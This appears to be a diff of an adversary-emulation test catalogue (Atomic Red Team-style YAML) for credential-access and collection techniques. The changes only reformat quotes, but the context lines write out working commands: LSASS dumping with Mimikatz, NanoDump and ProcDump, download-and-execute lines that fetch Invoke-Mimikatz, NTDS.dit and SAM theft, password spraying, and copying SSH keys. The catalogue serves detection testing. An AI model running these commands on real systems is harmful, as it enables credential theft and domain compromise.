#{dumpert_exe}) -Force | Out-Null @@ -3651,7 +3651,7 @@ credential-access: command: "#{dumpert_exe}\n" cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using NanoDump 
@@ -3669,21 +3669,21 @@ credential-access: - description: 'NanoDump executable must exist on disk at specified location ($env:TEMP\nanodump.x64.exe) - ' +' prereq_command: 'if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe" executor: command: '%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp" - ' +' cleanup_command: 'del "%temp%\nanodump.dmp" >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Windows Task Manager @@ -3726,10 +3726,10 @@ credential-access: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) - ' +' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -3739,19 +3739,19 @@ credential-access: Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force - description: 'Lsass dump must exist at specified location (#{input_file}) - ' +' prereq_command: 'cmd /c "if not exist #{input_file} (exit /b 1)" - ' +' get_prereq_command: 'Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" - ' +' executor: command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit - ' +' name: command_prompt elevation_required: true - name: LSASS read with pypykatz 
@@ -3768,35 +3768,35 @@ credential-access: dependencies: - description: 'Computer must have python 3 installed - ' +' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' - description: 'Computer must have pip installed - ' +' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" - ' +' - description: 'pypykatz must be installed and part of PATH - ' +' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz - ' +' executor: command: 'pypykatz live lsa - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Out-Minidump.ps1 @@ -3813,7 +3813,7 @@ credential-access: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Create Mini Dump of LSASS.exe using ProcDump @@ -3841,10 +3841,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) - ' +' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force @@ -3854,7 +3854,7 @@ credential-access: command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Powershell Mimikatz 
@@ -3876,7 +3876,7 @@ credential-access: command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}''); Invoke-Mimikatz -DumpCreds - ' +' name: powershell elevation_required: true - name: Dump LSASS with .Net 5 createdump.exe @@ -3898,15 +3898,15 @@ credential-access: dependencies: - description: 'Computer must have createdump.exe from .Net 5 - ' +' prereq_command: 'if (Test-Path ''#{createdump_exe}'') {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe" - ' +' executor: command: | echo "Createdump Path #{createdump_exe}" @@ -3916,7 +3916,7 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs @@ -3941,10 +3941,10 @@ credential-access: dependencies: - description: 'Computer must have xordump.exe - ' +' prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} @@ -3952,7 +3952,7 @@ credential-access: command: "#{xordump_exe} -out #{output_file} -x 0x41\n" cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: true T1557: 
@@ -4158,19 +4158,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' executor: command: 'vssadmin.exe create shadow /for=#{drive_letter} - ' +' name: command_prompt elevation_required: true - name: Copy NTDS.dit from Volume Shadow Copy @@ -4197,34 +4197,34 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' - description: 'Volume shadow copy must exist - ' +' prereq_command: 'if not exist #{vsc_name} (exit /b 1) - ' +' get_prereq_command: 'echo Run "Invoke-AtomicTest T1003.003 -TestName ''Create Volume Shadow Copy with vssadmin''" to fulfill this requirement - ' +' - description: 'Extract path must exist - ' +' prereq_command: 'if not exist #{extract_path} (exit /b 1) - ' +' get_prereq_command: 'mkdir #{extract_path} - ' +' executor: command: | copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit 
@@ -4256,22 +4256,22 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' executor: command: | mkdir #{output_folder} ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q cleanup_command: 'rmdir /q /s #{output_folder} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with WMI @@ -4290,19 +4290,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' executor: command: 'wmic shadowcopy call create Volume=#{drive_letter} - ' +' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy remotely with WMI @@ -4325,18 +4325,18 @@ credential-access: - description: 'Target must be a reachable Domain Controller, and current context must be domain admin - ' +' prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief - ' +' get_prereq_command: 'echo Sorry, can''t connect to target host, check: network, firewall or permissions (must be admin on target) - ' +' executor: command: 'wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter} - ' +' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with Powershell 
@@ -4500,11 +4500,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4530,11 +4530,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4577,14 +4577,14 @@ credential-access: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". - ' +' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. - ' +' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -4592,7 +4592,7 @@ credential-access: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 - ' +' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture 
@@ -4759,10 +4759,10 @@ credential-access: dependencies: - description: 'Gsecdump must exist on disk at specified location (#{gsecdump_exe}) - ' +' prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" @@ -4827,7 +4827,7 @@ credential-access: C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore - ' +' name: powershell elevation_required: true T1110.002: @@ -4995,7 +4995,7 @@ credential-access: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. - ' +' supported_platforms: - windows input_arguments: @@ -5008,14 +5008,14 @@ credential-access: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) - ' +' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own password filter dll" - ' +' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -5107,7 +5107,7 @@ credential-access: description: 'Attempts to brute force a single Active Directory account by testing connectivity to the IPC$ share on a domain controller - ' +' supported_platforms: - windows input_arguments: @@ -5130,7 +5130,7 @@ credential-access: description: 'Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos - ' +' supported_platforms: - windows input_arguments: 
@@ -5180,7 +5180,7 @@ credential-access: auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69 description: 'Attempt to brute force Azure AD user via AzureAD powershell module. - ' +' supported_platforms: - azure-ad input_arguments: @@ -5197,14 +5197,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: name: powershell elevation_required: false @@ -5236,7 +5236,7 @@ credential-access: dependencies: - description: 'Check if running on a Debian based machine. - ' +' prereq_command: | if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi @@ -5244,7 +5244,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'apt-get update && apt-get install -y openssl sudo - ' +' executor: elevation_required: true command: | @@ -5267,7 +5267,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target - ' +' name: sh - name: SUDO brute force Redhat auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade @@ -5279,7 +5279,7 @@ credential-access: dependencies: - description: 'Check if running on a Redhat based machine. - ' +' prereq_command: | if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi @@ -5287,7 +5287,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'yum -y update && yum install -y openssl sudo - ' +' executor: elevation_required: true command: | 
@@ -5310,7 +5310,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target - ' +' name: sh T1555.005: technique: @@ -5476,13 +5476,13 @@ credential-access: dependencies: - description: 'List of domain users to password spray must exits at %temp%\users.txt - ' +' prereq_command: 'if not exist %temp%\users.txt (exit /b 1) - ' +' get_prereq_command: 'PathToAtomicsFolder\T1110.003\src\parse_net_users.bat - ' +' executor: name: command_prompt elevation_required: false @@ -5490,7 +5490,7 @@ credential-access: /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL - ' +' - name: Password Spray (DomainPasswordSpray) auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b description: | @@ -5589,14 +5589,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: name: powershell elevation_required: false @@ -5716,10 +5716,10 @@ credential-access: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | 
@@ -5753,35 +5753,35 @@ credential-access: - description: 'The PAM development library must be installed to build the PAM module - ' +' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi - ' +' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) - ' +' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} - ' +' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' T1552.004: technique: id: attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf @@ -5856,14 +5856,14 @@ credential-access: executor: command: 'dir c:\ /b /s .key | findstr /e .key - ' +' name: command_prompt elevation_required: true - name: Discover Private SSH Keys auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 description: 'Discover private SSH keys on a macOS or Linux system. - ' +' supported_platforms: - macos - linux @@ -5879,17 +5879,17 @@ credential-access: executor: command: 'find #{search_path} -name id_rsa >> #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: sh - name: Copy Private SSH Keys with CP auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 description: 'Copy private SSH keys on a Linux system to a staging folder using the `cp` command. - ' +' supported_platforms: - linux input_arguments: 
@@ -5907,14 +5907,14 @@ credential-access: find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \; cleanup_command: 'rm #{output_folder} - ' +' name: sh - name: Copy Private SSH Keys with rsync auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a description: 'Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. - ' +' supported_platforms: - macos - linux @@ -5933,14 +5933,14 @@ credential-access: find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} - ' +' name: sh - name: Copy the users GnuPG directory with rsync auto_generated_guid: 2a5a0601-f5fb-4e2e-aa09-73282ae6afca description: 'Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the `rsync` command. - ' +' supported_platforms: - macos - linux @@ -5959,7 +5959,7 @@ credential-access: find #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} - ' +' name: sh - name: ADFS token signing and encryption certificates theft - Local auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f @@ -5972,13 +5972,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. - ' +' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AADInternals -Force - ' +' executor: command: | Import-Module AADInternals -Force 
@@ -6018,14 +6018,14 @@ credential-access: dependencies: - description: 'AADInternals and ActiveDirectory modules must be installed. - ' +' prereq_command: 'if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1} - ' +' get_prereq_command: 'Install-Module -Name AADInternals -Force - ' +' executor: command: "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc @@ -6120,7 +6120,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist - ' +' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6141,7 +6141,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" - ' +' - name: Dump individual process memory with Python (Local) auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 description: | @@ -6169,7 +6169,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist - ' +' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6178,11 +6178,11 @@ credential-access: echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - description: 'Requires Python - ' +' prereq_command: "(which python || which python3 || which python2)\n" get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed" - ' +' executor: name: sh elevation_required: true @@ -6194,7 +6194,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" - ' +' T1606.002: technique: external_references: 
@@ -6289,13 +6289,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. - ' +' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AADInternals -Force - ' +' executor: command: | Import-Module AADInternals -Force @@ -6383,42 +6383,42 @@ credential-access: auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 description: 'Parses registry hives to obtain stored credentials - ' +' supported_platforms: - windows dependency_executor_name: command_prompt dependencies: - description: 'Computer must have python 3 installed - ' +' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' - description: 'Computer must have pip installed - ' +' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" - ' +' - description: 'pypykatz must be installed and part of PATH - ' +' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz - ' +' executor: command: 'pypykatz live registry - ' +' name: command_prompt elevation_required: true - name: esentutl.exe SAM copy @@ -6444,12 +6444,12 @@ credential-access: executor: command: 'esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} - ' +' name: command_prompt elevation_required: true cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1 - ' +' - name: PowerDump Registry dump of SAM for hashes and usernames auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 description: Executes a hashdump by reading the hasshes from the registry. @@ -6501,7 +6501,7 @@ credential-access: auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0 description: 'Dump hives from volume shadow copies with System.IO.File - ' +' supported_platforms: - windows input_arguments: 
@@ -7315,7 +7315,7 @@ collection: elevation_required: false command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} - ' +' cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore' T1560.003: technique: @@ -7411,7 +7411,7 @@ collection: auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8 description: 'Uses GZip from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -7427,10 +7427,10 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash @@ -7438,15 +7438,15 @@ collection: command: '$which_python -c "import gzip;input_file=open(''#{path_to_input_file}'', ''rb'');content=input_file.read();input_file.close();output_file=gzip.GzipFile(''#{path_to_output_file}'',''wb'',''compresslevel=6'');output_file.write(content);output_file.close();" - ' +' cleanup_command: 'rm #{path_to_output_file} - ' +' - name: Compressing data using bz2 in Python (Linux) auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d description: 'Uses bz2 from Python to compress files - ' +' supported_platforms: - linux input_arguments: 
@@ -7462,25 +7462,25 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash elevation_required: false command: '$which_python -c "import bz2;input_file=open(''#{path_to_input_file}'',''rb'');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open(''#{path_to_output_file}'',''w+'');output_file.write(bz2content);output_file.close();" - ' +' cleanup_command: 'rm #{path_to_output_file} - ' +' - name: Compressing data using zipfile in Python (Linux) auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0 description: 'Uses zipfile from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -7496,10 +7496,10 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash @@ -7507,15 +7507,15 @@ collection: command: '$which_python -c "from zipfile import ZipFile; ZipFile(''#{path_to_output_file}'', mode=''w'').write(''#{path_to_input_file}'')" - ' +' cleanup_command: 'rm #{path_to_output_file} - ' +' - name: Compressing data using tarfile in Python (Linux) auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db description: 'Uses tarfile from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -7531,10 +7531,10 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash @@ -7543,7 +7543,7 @@ collection: mode='w').write('#{path_to_input_file}')\" \n" cleanup_command: 'rm #{path_to_output_file} - ' +' T1560.001: technique: created: '2020-02-20T21:01:25.428Z' 
@@ -7626,10 +7626,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) - ' +' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7639,10 +7639,10 @@ collection: elevation_required: false command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension} - ' +' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 - ' +' - name: Compress Data and lock with password for Exfiltration with winrar auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c description: | @@ -7662,10 +7662,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) - ' +' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7703,11 +7703,11 @@ collection: dependencies: - description: 'Winzip must be installed - ' +' prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo 0)'' - ' +' get_prereq_command: | if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue @@ -7727,7 +7727,7 @@ collection: auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 description: 'Note: Requires 7zip installation - ' +' supported_platforms: - windows input_arguments: 
@@ -7742,10 +7742,10 @@ collection: dependencies: - description: '7zip tool must be installed at specified location (#{7zip_exe}) - ' +' prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading 7-zip installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer} @@ -7764,7 +7764,7 @@ collection: description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. - ' +' supported_platforms: - linux - macos @@ -7781,11 +7781,11 @@ collection: dependencies: - description: 'Files to zip must exist (#{input_files}) - ' +' prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | (which yum && yum -y epel-release zip)||(which apt-get && apt-get install -y zip) echo Please set input_files argument to include files that exist @@ -7794,16 +7794,16 @@ collection: elevation_required: false command: 'zip #{output_file} #{input_files} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' - name: Data Compressed - nix - gzip Single File auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. - ' +' supported_platforms: - linux - macos 
@@ -7823,16 +7823,16 @@ collection: command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}'' >> #{input_file}; gzip -k #{input_file}) - ' +' cleanup_command: 'rm -f #{input_file}.gz - ' +' - name: Data Compressed - nix - tar Folder or File auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. - ' +' supported_platforms: - linux - macos @@ -7848,28 +7848,28 @@ collection: dependencies: - description: 'Folder to zip must exist (#{input_file_folder}) - ' +' prereq_command: 'test -e #{input_file_folder} - ' +' get_prereq_command: 'echo Please set input_file_folder argument to a folder that exists - ' +' executor: name: sh elevation_required: false command: 'tar -cvzf #{output_file} #{input_file_folder} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' - name: Data Encrypted with zip and gpg symmetric auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f' description: 'Encrypt data for exiltration - ' +' supported_platforms: - macos - linux @@ -7892,7 +7892,7 @@ collection: prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)\n" executor: @@ -7906,7 +7906,7 @@ collection: ls -l #{test_folder} cleanup_command: 'rm -Rf #{test_folder} - ' +' T1123: technique: id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967 @@ -7956,7 +7956,7 @@ collection: executor: command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet - ' +' name: powershell T1119: technique: 
@@ -8026,7 +8026,7 @@ collection: for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1 - ' +' name: command_prompt - name: Automated Collection PowerShell auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 @@ -8042,7 +8042,7 @@ collection: cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | Out-Null - ' +' name: powershell - name: Recon information for export with PowerShell auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 @@ -8131,7 +8131,7 @@ collection: auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 description: 'Add data to clipboard to copy off or execute commands from. - ' +' supported_platforms: - windows executor: @@ -8141,14 +8141,14 @@ collection: clip < %temp%\T1115.txt cleanup_command: 'del %temp%\T1115.txt >nul 2>&1 - ' +' name: command_prompt - name: Execute Commands from Clipboard using PowerShell auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 description: 'Utilize PowerShell to echo a command to clipboard and execute it - ' +' supported_platforms: - windows executor: @@ -8171,7 +8171,7 @@ collection: description: 'This module copies the data stored in the user''s clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt - ' +' supported_platforms: - windows input_arguments: @@ -8183,7 +8183,7 @@ collection: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -8194,7 +8194,7 @@ collection: get_prereq_command: 'Write-Host "You will need to 